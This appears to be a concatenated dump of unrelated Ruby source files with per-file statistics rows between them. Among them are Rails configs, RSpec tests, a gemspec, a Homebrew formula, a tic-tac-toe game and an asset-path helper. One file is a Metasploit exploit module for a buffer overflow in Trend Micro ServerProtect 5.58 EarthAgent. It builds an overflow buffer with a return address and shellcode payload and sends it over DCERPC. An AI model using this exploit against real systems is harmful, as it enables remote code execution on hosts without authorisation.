fill_in('Username', with: 'user')
fill_in('Password', with: 'verySecret')
click_test_then_save_integration(expect_test_to_fail: false)
expect(page).to have_content('JetBrains TeamCity settings saved and active.')
end
end
| 28.192308 | 81 | 0.729877 |
e9bf13ae762bc9f0bdbfe55a90c568d0ca917316 | 1,458 | module TicTacToe
class Game
attr_reader :players, :board, :current_player, :other_player
def initialize(players, board=Board.new)
@players = players
@board = board
@current_player, @other_player = players.shuffle
end
def switch_players
@current_player, @other_player = @other_player, @current_player
end
def solicit_move
"#{current_player.name}: Enter a number between 1 and 9 to make your move"
end
def get_move(human_move = gets.chomp)
human_move_to_coordinate(human_move)
end
def human_move_to_coordinate(human_move)
mapping = {
"1" => [0, 0],
"2" => [1, 0],
"3" => [2, 0],
"4" => [0, 1],
"5" => [1, 1],
"6" => [2, 1],
"7" => [0, 2],
"8" => [1, 2],
"9" => [2, 2]
}
mapping[human_move]
end
def game_over_message
return "#{current_player.name} won!" if board.game_over? == :winner
return "The game ended in a tie" if board.game_over? == :draw
end
def play
puts "#{current_player.name} has randomly been selected as the first player"
while true
board.formatted_grid
puts ""
puts solicit_move
x, y = get_move
board.set_cell(x, y, current_player.color)
if board.game_over?
puts game_over_message
board.formatted_grid
return
else
switch_players
end
end
end
end
end | 23.142857 | 80 | 0.581619 |
38baa81995767ac947238e82f1fbe6ee8877b657 | 3,067 | require 'spec_helper'
describe Banzai::Filter::GollumTagsFilter, lib: true do
include FilterSpecHelper
let(:project) { create(:project) }
let(:user) { double }
let(:project_wiki) { ProjectWiki.new(project, user) }
describe 'validation' do
it 'ensures that a :project_wiki key exists in context' do
expect { filter("See [[images/image.jpg]]", {}) }.to raise_error ArgumentError, "Missing context keys for Banzai::Filter::GollumTagsFilter: :project_wiki"
end
end
context 'linking internal images' do
it 'creates img tag if image exists' do
file = Gollum::File.new(project_wiki.wiki)
expect(file).to receive(:path).and_return('images/image.jpg')
expect(project_wiki).to receive(:find_file).with('images/image.jpg').and_return(file)
tag = '[[images/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('img')['src']).to eq "#{project_wiki.wiki_base_path}/images/image.jpg"
end
it 'does not create img tag if image does not exist' do
expect(project_wiki).to receive(:find_file).with('images/image.jpg').and_return(nil)
tag = '[[images/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.css('img').size).to eq 0
end
end
context 'linking external images' do
it 'creates img tag for valid URL' do
tag = '[[http://example.com/image.jpg]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('img')['src']).to eq "http://example.com/image.jpg"
end
it 'does not create img tag for invalid URL' do
tag = '[[http://example.com/image.pdf]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.css('img').size).to eq 0
end
end
context 'linking external resources' do
it "the created link's text will be equal to the resource's text" do
tag = '[[http://example.com]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'http://example.com'
expect(doc.at_css('a')['href']).to eq 'http://example.com'
end
it "the created link's text will be link-text" do
tag = '[[link-text|http://example.com/pdfs/gollum.pdf]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'link-text'
expect(doc.at_css('a')['href']).to eq 'http://example.com/pdfs/gollum.pdf'
end
end
context 'linking internal resources' do
it "the created link's text will be equal to the resource's text" do
tag = '[[wiki-slug]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'wiki-slug'
expect(doc.at_css('a')['href']).to eq 'wiki-slug'
end
it "the created link's text will be link-text" do
tag = '[[link-text|wiki-slug]]'
doc = filter("See #{tag}", project_wiki: project_wiki)
expect(doc.at_css('a').text).to eq 'link-text'
expect(doc.at_css('a')['href']).to eq 'wiki-slug'
end
end
end
| 34.077778 | 160 | 0.6433 |
61c201a82fabb68877aac96e95a1ff1ff20bb37a | 4,014 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like
# NGINX, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.serve_static_files = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Mail Setting
config.action_mailer.default_url_options = { host: ENV['ROOT_PATH'] }
config.action_mailer.delivery_method = :smtp
config.action_mailer.raise_delivery_errors = false
config.action_mailer.smtp_settings = {
address: Settings.smtp.address,
port: Settings.smtp.port,
enable_starttls_auto: Settings.smtp.enable_starttls_auto,
user_name: Settings.smtp.user_name,
password: Settings.smtp.password,
authentication: Settings.smtp.authentication
}
config.middleware.use ExceptionNotification::Rack,
email: {
email_prefix: "[glass]",
sender_address: %{"Notifier" <[email protected]>},
exception_recipients: %w{[email protected]}
}
end
| 39.742574 | 102 | 0.758844 |
793c76480e58731ba084e98c2d2486680eff5479 | 1,027 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "xspec/version"
Gem::Specification.new do |spec|
spec.name = "simple-xspec-wrapper"
spec.version = XSpec::VERSION
spec.authors = ["Matt Patterson"]
spec.email = ["[email protected]"]
spec.summary = %q{A simple wrapper to run a suite of XSpec tests independently}
spec.homepage = "https://github.com/fidothe/simple-xspec-wrapper"
spec.license = "MIT"
spec.platform = 'java'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features|\.ruby-version)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_dependency "saxon-xslt", "~> 0.8"
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 35.413793 | 87 | 0.640701 |
4a300dd28888dc79c39d88a0e5df89b3ebf9f8eb | 632 | class Role < ApplicationRecord
has_and_belongs_to_many :users, :join_table => :users_roles
belongs_to :resource,
:polymorphic => true,
:optional => true
validates :resource_type,
:inclusion => { :in => Rolify.resource_types },
:allow_nil => true
scopify
has_many :permissions, as: :permissible
has_paper_trail
end
| 19.75 | 59 | 0.648734 |
f884cf1689ededa22052ed4ab5d55eee438361d1 | 1,304 | require "language/node"
class Babel < Formula
desc "Compiler for writing next generation JavaScript"
homepage "https://babeljs.io/"
url "https://registry.npmjs.org/babel-cli/-/babel-cli-6.24.1.tgz"
sha256 "d69a00bdb4f35184cda1f5bfe8075cd4d569600b8e61d864d1f08e360367933b"
bottle do
rebuild 1
sha256 "fa63837b3f1351ef2d0307ab556e40bbd91c1bc383c6d4ada3a072471cb01b40" => :high_sierra
sha256 "102dda22f4541c686da92112bf3b7c91da7ace61e04633d19a9874ee6c3d8935" => :sierra
sha256 "7dde27b4e0d9901fa2b2f3051fbe5b11baa3635e7bfac15ae4a0690e0270f067" => :el_capitan
sha256 "7aefce36cb45b334a7585aab124cc6521d23b202126ed57b1b5c4eff394b6988" => :x86_64_linux
end
devel do
url "https://registry.npmjs.org/babel-cli/-/babel-cli-7.0.0-alpha.12.tgz"
sha256 "a81e2421486ca48d3961c4ab1fada8acd3bb3583ccfb28822cbb0b16a2635144"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
(testpath/"script.js").write <<-EOS.undent
[1,2,3].map(n => n + 1);
EOS
system bin/"babel", "script.js", "--out-file", "script-compiled.js"
assert_predicate testpath/"script-compiled.js", :exist?, "script-compiled.js was not generated"
end
end
| 34.315789 | 99 | 0.751534 |
f7e306b0032b9a59d0d1962200d4aae84de0d5c4 | 859 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-svg-viewer"
s.version = package["version"]
s.summary = package["description"]
s.description = <<-DESC
react-native-svg-viewer
DESC
s.homepage = "https://github.com/welldsagl/react-native-svg-viewer"
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
s.authors = { "Gabriele Prestifilippo" => "[email protected]" }
s.platforms = { :ios => "9.0", :tvos => "10.0" }
s.source = { :git => "https://github.com/welldsagl/react-native-svg-viewer.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,swift}"
s.requires_arc = true
s.dependency "React"
# s.dependency "..."
end
| 31.814815 | 113 | 0.57858 |
6afffef640de3fc62fb3d731c3c9ea84e644b674 | 1,317 | require 'bundler/setup'
require 'yaml'
require 'rspec'
require 'rspec/its'
require 'rspec/collection_matchers'
require 'yaml'
require 'active_support'
require 'active-orient'
read_yml = -> (key) do
YAML::load_file( File.expand_path('../spec.yml',__FILE__))[key]
end
OPT ||= {}
[:oetl,:orientdb, :admin].each{|kw| OPT[kw] = read_yml[kw] }
if OPT.empty?
puts "spec/spec.yml not found or misconfigurated"
puts "expected: "
puts <<EOS
:orientdb:
:server: localhost
:port: 2480
:database: some_database
:admin:
:user: hctw
:pass: hc
EOS
Kernel.exit
else
puts "OPT: #{OPT.inspect}"
end
RSpec.configure do |config|
config.mock_with :rspec
config.color = true
# allows restricting which specs are run
# via >>it "something", :focus => true do <<
config.filter_run :focus => true
config.run_all_when_everything_filtered = true
config.order = 'defined' # "random"
end
RSpec.shared_context 'private', private: true do
before :all do
described_class.class_eval do
@original_private_instance_methods = private_instance_methods
public *@original_private_instance_methods
end
end
after :all do
described_class.class_eval do
private *@original_private_instance_methods
end
end
end
| 20.904762 | 72 | 0.688686 |
b9b58700ee425c1bf64973ba9c631544ec756c5b | 1,046 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
# require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module ApiExample
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 32.6875 | 82 | 0.771511 |
217f7175d16f34259f87ca558dc242bd4146a31d | 270 | use Rack::Static,
:urls => ["/images", "/js", "/css"],
:root => "public"
run lambda { |env|
[
200,
{
'Content-Type' => 'text/html',
'Cache-Control' => 'public, max-age=86400'
},
File.open('public/index.html', File::RDONLY)
]
}
| 16.875 | 49 | 0.496296 |
4ab700d97b1c12b7851ae39cdf09e490be91e383 | 988 | # frozen_string_literal: true
# == Schema Information
#
# Table name: microposts
#
# id :bigint not null, primary key
# content :text
# created_at :datetime not null
# updated_at :datetime not null
# user_id :bigint
#
# Indexes
#
# index_microposts_on_user_id (user_id)
# index_microposts_on_user_id_and_created_at (user_id,created_at)
#
# Foreign Keys
#
# fk_rails_... (user_id => users.id)
#
require 'rails_helper'
RSpec.describe Micropost, type: :model do
describe 'validations' do
subject(:micropost) { create(:micropost) }
it { is_expected.to be_valid }
it { is_expected.to accept_content_types('image/png', 'image/jpeg', 'image/jpg', 'image/gif').for(:image) }
it { is_expected.to validate_presence_of(:content) }
it { is_expected.to validate_length_of(:content).is_at_most(140) }
it { is_expected.to validate_presence_of(:user_id) }
it { is_expected.to belong_to(:user) }
end
end
| 27.444444 | 111 | 0.676113 |
e298fc0cdbf507fb83dd04ddd7c0ea8ae009a4b9 | 645 | class UserMailer < ActionMailer::Base
helper :days
default from: Rails.configuration.noreply_email
def introduction(user, token)
@user = user
@token = token
mail to: @user.email
end
def closure_notification(user, token)
@user = user
@token = token
mail to: @user.email
end
def feedback_not_received(user, token)
@user = user
@token = token
mail to: @user.email
end
def feedback_not_given(review, token)
@review = review
@token = token
mail to: @review.author_email
end
def closing_soon(user, token)
@user = user
@token = token
mail to: @user.email
end
end
| 18.428571 | 49 | 0.657364 |
6af335c747c380096a0c31ccb9d7588754741771 | 333 | class APIStats < APIMain
def bounces
data(URLS_STATS[:bounces])
end
def cycle
data(URLS_STATS[:cycle])
end
def history
data(URLS_STATS[:history])
end
def spam
data(URLS_STATS[:spam])
end
def summary
data(URLS_STATS[:summary])
end
def unsubscribe
data(URLS_STATS[:unsubs])
end
end
| 12.807692 | 30 | 0.660661 |
62ed52ccb1bd8c7162eb1f325763a0c190ca3764 | 1,270 | module Mazes
# Internal: Standard interface for all Space-manipulating Algorithms that create
# mazes. Algorithm subclasses need only define a single method which, when
# called, will execute the algorithm on a Space.
class Algorithm
# Internal: Executes an algorithm on a Space of Cells.
#
# space - A Space of Cells over which to execute.
# origin - A Cell from which to start the Algorithm. Defaults to random choice.
# Iterative Algorithms do not use origin; random Algorithms do. However, all
# Algorithm subclasses must include it in their signature, even if it is going
# to be discarded, in order to fit Ruby's expectations.
#
# The Space is modified in-place, and so the return value need not be captured
# in order to proceed. The space is returned from this function to permit method
# chaining for convenience.
#
# Returns the modified Space.
#
# Raises a NotImplementedError exception (see the illustrative subclass sketch after this class).
def self.act_on space:, origin: space.sample
raise NotImplementedError, "#{self} has not implemented an action"
space
end
# Public: Strip the scoping identifiers from the Algorithm name, because frankly
# Mazes::Algorithms:: is just a waste of space.
#
# Returns a String naming the Algorithm.
def self.to_s
super.to_s.gsub(/.*::/, '')
end
end
end
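# Illustrative sketch (not part of the original file): a minimal Algorithm
# subclass honouring the act_on contract described above. Space#sample comes
# from the original signature; Space#each_cell, Cell#neighbors and Cell#link
# are assumed APIs for the purpose of the example.
# module Mazes
#   module Algorithms
#     class RandomWalk < Algorithm
#       def self.act_on space:, origin: space.sample
#         current = origin
#         space.each_cell do |_cell|
#           step = current.neighbors.sample
#           current.link step if step
#           current = step || space.sample
#         end
#         space
#       end
#     end
#   end
# end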
| 34.324324 | 80 | 0.752756 |
18964eda9ccd8fa3eb7a24f81c6ad11e24f48671 | 1,069 | class RubyBuild < Formula
desc "Install various Ruby versions and implementations"
homepage "https://github.com/rbenv/ruby-build"
url "https://github.com/rbenv/ruby-build/archive/v20210119.tar.gz"
sha256 "5c49a0b46a471f8f6a176a56637ded1a09c7a583fa02451ae8a93ad5ced772c1"
license "MIT"
head "https://github.com/rbenv/ruby-build.git"
bottle :unneeded
depends_on "autoconf"
depends_on "pkg-config"
depends_on "readline"
def install
ENV["PREFIX"] = prefix
system "./install.sh"
end
def caveats
<<~EOS
ruby-build installs a non-Homebrew OpenSSL for each Ruby version installed and these are never upgraded.
To link Rubies to Homebrew's OpenSSL 1.1 (which is upgraded) add the following
to your #{shell_profile}:
export RUBY_CONFIGURE_OPTS="--with-openssl-dir=$(brew --prefix [email protected])"
Note: this may interfere with building old versions of Ruby (e.g <2.4) that use
OpenSSL <1.1.
EOS
end
test do
assert_match "2.0.0", shell_output("#{bin}/ruby-build --definitions")
end
end
| 28.891892 | 110 | 0.710945 |
ab4665317c83e23b4d3999de3b139f270f6f5818 | 4,039 | module Sinatra
module Sprockets
class AssetPaths
attr_reader :config
class AssetNotPrecompiledError < StandardError; end
def initialize(config)
@config = config
end
def asset_for(source, ext)
source = source.to_s
return nil if is_uri?(source)
source = rewrite_extension(source, nil, ext)
config.environment[source]
rescue ::Sprockets::FileOutsidePaths
nil
end
def digest_for(logical_path)
if config.digest_assets? && config.digests && (digest = config.digests[logical_path])
digest
else
if config.compile_assets?
if config.digest_assets? && asset = config.environment[logical_path]
asset.digest_path
else
logical_path
end
else
raise AssetNotPrecompiledError.new("#{logical_path} isn't precompiled")
end
end
end
def compute_public_path(source, dir, options = {})
source = source.to_s
unless is_uri?(source)
source = rewrite_extension(source, dir, options[:ext]) if options[:ext]
source = rewrite_asset_path(source, dir, options)
source = rewrite_relative_url_root(source, config.relative_url_root)
source = rewrite_host_and_protocol(source, options[:protocol])
end
source
end
def is_uri?(path)
path =~ %r{^[-a-z]+://|^cid:|^//}
end
def rewrite_host_and_protocol(source, protocol = nil)
host = compute_asset_host(source)
if host && !is_uri?(host)
if (protocol || default_protocol) == :request && !has_request?
host = nil
else
host = "#{compute_protocol(protocol)}#{host}"
end
end
host ? "#{host}#{source}" : source
end
def rewrite_relative_url_root(source, relative_url_root)
relative_url_root && !source.starts_with?("#{relative_url_root}/") ? "#{relative_url_root}#{source}" : source
end
def rewrite_asset_path(source, dir, options = {})
if source[0] == ?/
source
else
source = digest_for(source) unless options[:digest] == false
source = File.join(dir, source)
source = "/#{source}" unless source =~ /^\//
source
end
end
def rewrite_extension(source, dir, ext)
if ext && File.extname(source).empty?
"#{source}.#{ext}"
else
source
end
end
def compute_asset_host(source)
if host = config.host
if host.respond_to?(:call)
args = [source]
arity = arity_of(host)
if arity > 1 && request.nil?
invalid_asset_host!("Remove the second argument to your asset_host Proc if you do not need the request.")
end
args << current_request if (arity > 1 || arity < 0) && has_request?
host.call(*args)
else
(host =~ /%d/) ? host % (Zlib.crc32(source) % 4) : host
end
end
end
def default_protocol
config.default_protocol || (request.nil?? :relative : :request)
end
def compute_protocol(protocol)
protocol ||= default_protocol
case protocol
when :request
if request.nil?
invalid_asset_host!("The protocol requested was :request. Consider using :relative instead.")
end
request.protocol
when :relative
"//"
else
"#{protocol}://"
end
end
def arity_of(callable)
callable.respond_to?(:arity) ? callable.arity : callable.method(:call).arity
end
def invalid_asset_host!(help_message)
raise ActionController::RoutingError, "This asset host cannot be computed without a request in scope. #{help_message}"
end
end
end
end | 30.832061 | 126 | 0.562763 |
ac58666e85da1722115e75a415f883240a611f56 | 319 | Given(/^the following YouTube channels exist for the site "(.*?)":$/) do |site_name, table|
site = Affiliate.find_by_name(site_name)
table.hashes.each do |hash|
profile = YoutubeProfile.where(hash).first_or_initialize
profile.save!
site.youtube_profiles << profile
end
site.enable_video_govbox!
end
| 31.9 | 91 | 0.733542 |
e84af04dbc8bbaaee84d824d91c0723453dc000c | 6,375 | require "rails_helper"
describe "Event", type: :feature do
describe "index page" do
it "should link to the show page when an event title is clicked" do
event = FactoryGirl.create :event
visit events_path
click_link event.name
expect(page).to have_current_path(event_path(event))
end
end
describe "create page" do
['Camp', 'Workshop'].each do |kind|
it "should allow picking the #{kind} kind camp" do
visit new_event_path
fill_in "Maximale Teilnehmerzahl", :with => 25
choose(kind)
click_button I18n.t('.events.form.publish')
expect(page).to have_text(kind)
end
end
it "should not allow dates in the past" do
visit new_event_path
fill_in "event[date_ranges_attributes][][start_date]", with: Date.yesterday.prev_day
fill_in "event[date_ranges_attributes][][end_date]", with: Date.yesterday
click_button I18n.t('.events.form.publish')
expect(page).to have_text('Anfangs-Datum darf nicht in der Vergangenheit liegen')
end
it "should warn about unreasonably long time spans" do
visit new_event_path
fill_in 'Maximale Teilnehmerzahl', :with => 25
fill_in "event_application_deadline", :with => Date.current
fill_in "event[date_ranges_attributes][][start_date]", with: Date.current
fill_in "event[date_ranges_attributes][][end_date]", with: Date.current.next_year(3)
click_button I18n.t('.events.form.publish')
expect(page).to have_text('End-Datum liegt ungewöhnlich weit vom Start-Datum entfernt.')
end
it "should not allow an end date before a start date" do
visit new_event_path
fill_in "event[date_ranges_attributes][][start_date]", with: Date.current
fill_in "event[date_ranges_attributes][][end_date]", with: Date.current.prev_day(2)
click_button I18n.t('.events.form.publish')
expect(page).to have_text('End-Datum kann nicht vor Start-Datum liegen')
end
it "should allow entering multiple time spans", js: true do
visit new_event_path
first_from = Date.tomorrow.next_day(1)
first_to = Date.tomorrow.next_day(2)
second_from = Date.tomorrow.next_day(6)
second_to = Date.tomorrow.next_day(8)
fill_in 'Maximale Teilnehmerzahl', :with => 25
fill_in "event[date_ranges_attributes][][start_date]", with: I18n.l(first_from)
fill_in "event[date_ranges_attributes][][end_date]", with: I18n.l(first_to)
click_link "Zeitspanne hinzufügen"
within page.find('#event-date-pickers').all('div')[1] do
fill_in "event[date_ranges_attributes][][start_date]", with: I18n.l(second_from)
fill_in "event[date_ranges_attributes][][end_date]", with: I18n.l(second_to)
end
fill_in "event_application_deadline", :with => I18n.l(Date.tomorrow)
click_button I18n.t('.events.form.publish')
expect(page).to have_text (DateRange.new start_date: first_from, end_date: first_to)
expect(page).to have_text (DateRange.new start_date: second_from, end_date: second_to)
end
it "should save application deadline" do
visit new_event_path
deadline = Date.tomorrow
fill_in "event_name", :with => "Event Name"
fill_in "event_max_participants", :with => 12
fill_in "event_application_deadline", :with => I18n.l(deadline)
fill_in "event[date_ranges_attributes][][start_date]", :with => Date.current.next_day(2)
fill_in "event[date_ranges_attributes][][end_date]", :with => Date.current.next_day(3)
click_button I18n.t('.events.form.publish')
expect(page).to have_text("Bewerbungsschluss: " + I18n.l(deadline))
end
it "should not allow an application deadline after the start of the event" do
visit new_event_path
fill_in "event_max_participants", :with => 12
fill_in "event_application_deadline", :with => Date.tomorrow
fill_in "event[date_ranges_attributes][][start_date]", :with => Date.current
click_button I18n.t('.events.form.publish')
expect(page).to have_text("Bewerbungsschluss muss vor Beginn der Veranstaltung liegen")
end
end
describe "show page" do
it "should display the event kind" do
%i[camp workshop].each do |kind|
event = FactoryGirl.create(:event, kind: kind)
visit event_path(event)
expect(page).to have_text(kind.to_s.humanize)
end
end
it "should display a single day date range as a single date" do
event = FactoryGirl.create(:event, :single_day)
visit event_path(event)
expect(page).to have_text(event.date_ranges.first.start_date)
expect(page).to_not have_text(" bis " + I18n.l(event.date_ranges.first.end_date))
end
it "should display all date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
visit event_path(event.id)
expect(page).to have_text(event.date_ranges.first)
expect(page).to have_text(event.date_ranges.second)
end
it "should show that the application deadline is on midnight of the picked date" do
event = FactoryGirl.create(:event)
visit event_path(event.id)
expect(page).to have_text(I18n.l(event.application_deadline) + " Mitternacht")
end
end
describe "edit page" do
it "should preselect the event kind" do
event = FactoryGirl.create(:event, kind: :camp)
visit edit_event_path(event)
expect(find_field('Camp')[:checked]).to_not be_nil
end
it "should display all existing date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
visit edit_event_path(event.id)
page.assert_selector('[name="event[date_ranges_attributes][][start_date]"]', count: 2)
end
it "should save edits to the date ranges" do
event = FactoryGirl.create(:event, :with_two_date_ranges)
date_start = Date.current.next_year
date_end = Date.tomorrow.next_year
visit edit_event_path(event.id)
within page.find('#event-date-pickers').first('div') do
fill_in "event[date_ranges_attributes][][start_date]", with: date_start
fill_in "event[date_ranges_attributes][][end_date]", with: date_end
end
click_button I18n.t('.events.form.update')
expect(page).to have_text (DateRange.new start_date: date_start, end_date: date_end)
end
end
end
| 38.636364 | 94 | 0.693804 |
6a7fb3dcbdec7eacb065bda67a5f390d27f01d72 | 654 | class MobilityStringTranslation < ApplicationRecord
belongs_to :translatable, polymorphic: true
belongs_to :created_by, class_name: "User", optional: true
validates :locale, presence: true
validates :key, presence: true
validates :value, presence: true
validates :translatable_id, uniqueness: { scope: [:translatable_type, :locale, :key] }
scope :translatable, ->(record) { where(translatable_id: record.id).where(translatable_type: record.class.to_s) }
scope :locale, ->(locale) { where("locale ILIKE ?", locale) }
scope :key, ->(key) { where("key ILIKE ?", key) }
scope :value, ->(value) { where("value ILIKE ?", value) }
end
| 38.470588 | 115 | 0.70948 |
b952e1db109ec627be9ec02d97e60ed5e716aca1 | 1,090 | require "rack"
require "spec_helper"
require "raptor"
describe Raptor::Route do
let(:injector) { Raptor::Injector.new }
it "errors if redirect target doesn't exist"
it "can render text" do
app = Raptor::App.new(Object) {}
route = Raptor::BuildsRoutes.new(app).root(:text => "the text")
req = request("GET", "/posts")
response = route.respond_to_request(injector, req)
response.body.join.strip.should == "the text"
end
class OnlyIDOfFive
def match?(id)
id == '5'
end
end
it "injects route params into the presenter" do
route = Raptor::Route.new(:show, '/posts/:id', [OnlyIDOfFive.new], stub, stub, stub)
req = request("GET", "/posts/5")
route.match?(injector, req).should be_true
end
it "routes to nested routes"
it "stores templates in templates directory, not views"
it "allows overriding of the presenter class"
it "doesn't require .html.erb on template names"
it "includes type definitions in routes so they can be casted before injection"
end
class MatchingRequirement
def self.match?
true
end
end
| 25.348837 | 88 | 0.685321 |
019cce88c6ce3973271b8ee71527d2f61d3cb018 | 2,369 | ##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
['CVE', '2007-2508'],
['OSVDB', '35789'],
['BID', '23866'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x605e3c2f } ], # pop esi; pop ebx; ret / agentclient.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 7 2007'))
register_options( [ Opt::RPORT(3628) ], self.class )
end
def exploit
connect
handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
filler = rand_text_english(680) + Rex::Arch::X86.jmp_short(6)
filler << make_nops(2) + [target.ret].pack('V') + payload.encoded
len = filler.length
sploit = NDR.long(0x001f0014) + NDR.long(len) + filler + NDR.long(len)
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end | 28.202381 | 121 | 0.604897 |
ffd52dc857f47ccffaffbb69aed2f1295e734b07 | 1,156 | require 'spec_helper'
module Atlas
module Parser
module TextToHash
describe MultiLineBlock do
context 'with a correctly formatted block' do
let(:block) do
MultiLineBlock.new([
Line.new("~ demand ="),
Line.new(" SUM("),
Line.new(" 1,"),
Line.new(" 2"),
Line.new(" )")
])
end
describe '#key' do
it 'parses correctly' do
expect(block.key).to eql :demand
end
end
describe '#value' do
it 'parses correctly' do
expect(block.value).to eql "SUM(\n 1,\n 2\n)"
end
end
end
context 'when the value starts on the same line as the key' do
let(:block) do
MultiLineBlock.new([
Line.new("~ demand = SUM("),
Line.new(" 1"),
Line.new(" )")
])
end
it 'raises an error' do
expect { block.key }.to raise_error(Atlas::ParserError)
end
end
end
end
end
end
| 24.083333 | 70 | 0.446367 |
e21b8c80b738e403f4c0af7c82aca74d057ad20a | 542 | class CreateItemsQuestions < ActiveRecord::Migration
def self.up
create_table :items_questions do |t|
t.integer :item_id, :null => false
t.integer :question_id, :null => false
t.integer :position, :default => 1400, :null => false
t.integer :wins, :default => 0, :null => false
t.integer :ratings, :default => 0, :null => false
t.timestamps
end
add_index :items_questions, :item_id
add_index :items_questions, :question_id
end
def self.down
drop_table :items_questions
end
end
| 27.1 | 59 | 0.662362 |
bb6daae872f1111610e73acf6d6e094a0eeec56e | 856 | require 'spec_helper'
describe 'rundeck::config::securityroles', type: :define do
on_supported_os.each do |os, os_facts|
context "on #{os}" do
let(:facts) do
os_facts.merge(
